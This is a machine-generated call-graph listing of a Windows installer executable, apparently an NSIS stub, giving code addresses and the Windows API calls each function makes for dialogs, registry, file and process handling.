SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de KiUserCallbackDispatcher KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 